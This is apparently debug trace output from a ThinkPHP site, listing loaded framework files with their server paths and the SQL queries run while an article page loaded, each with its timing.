  132. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/response/View.php ( 3.29 KB )
  133. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cookie.php ( 6.06 KB )
  134. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-view/src/Think.php ( 8.38 KB )
  135. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/TemplateHandlerInterface.php ( 1.60 KB )
  136. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/Template.php ( 46.61 KB )
  137. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/driver/File.php ( 2.41 KB )
  138. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/contract/DriverInterface.php ( 0.86 KB )
  139. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/runtime/temp/067d451b9a0c665040f3f1bdd3293d68.php ( 11.98 KB )
  140. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Html.php ( 4.42 KB )
  1. CONNECT:[ UseTime:0.000591s ] mysql:host=127.0.0.1;port=3306;dbname=f_mffb;charset=utf8mb4
  2. SHOW FULL COLUMNS FROM `fenlei` [ RunTime:0.000809s ]
  3. SELECT * FROM `fenlei` WHERE `fid` = 0 [ RunTime:0.000316s ]
  4. SELECT * FROM `fenlei` WHERE `fid` = 63 [ RunTime:0.000287s ]
  5. SHOW FULL COLUMNS FROM `set` [ RunTime:0.000477s ]
  6. SELECT * FROM `set` [ RunTime:0.000217s ]
  7. SHOW FULL COLUMNS FROM `article` [ RunTime:0.000502s ]
  8. SELECT * FROM `article` WHERE `id` = 490847 LIMIT 1 [ RunTime:0.000452s ]
  9. UPDATE `article` SET `lasttime` = 1783043165 WHERE `id` = 490847 [ RunTime:0.006404s ]
  10. SELECT * FROM `fenlei` WHERE `id` = 67 LIMIT 1 [ RunTime:0.000282s ]
  11. SELECT * FROM `article` WHERE `id` < 490847 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000466s ]
  12. SELECT * FROM `article` WHERE `id` > 490847 ORDER BY `id` ASC LIMIT 1 [ RunTime:0.005605s ]
  13. SELECT * FROM `article` WHERE `id` < 490847 ORDER BY `id` DESC LIMIT 10 [ RunTime:0.009092s ]
  14. SELECT * FROM `article` WHERE `id` < 490847 ORDER BY `id` DESC LIMIT 10,10 [ RunTime:0.000888s ]
  15. SELECT * FROM `article` WHERE `id` < 490847 ORDER BY `id` DESC LIMIT 20,10 [ RunTime:0.000821s ]
0.094788s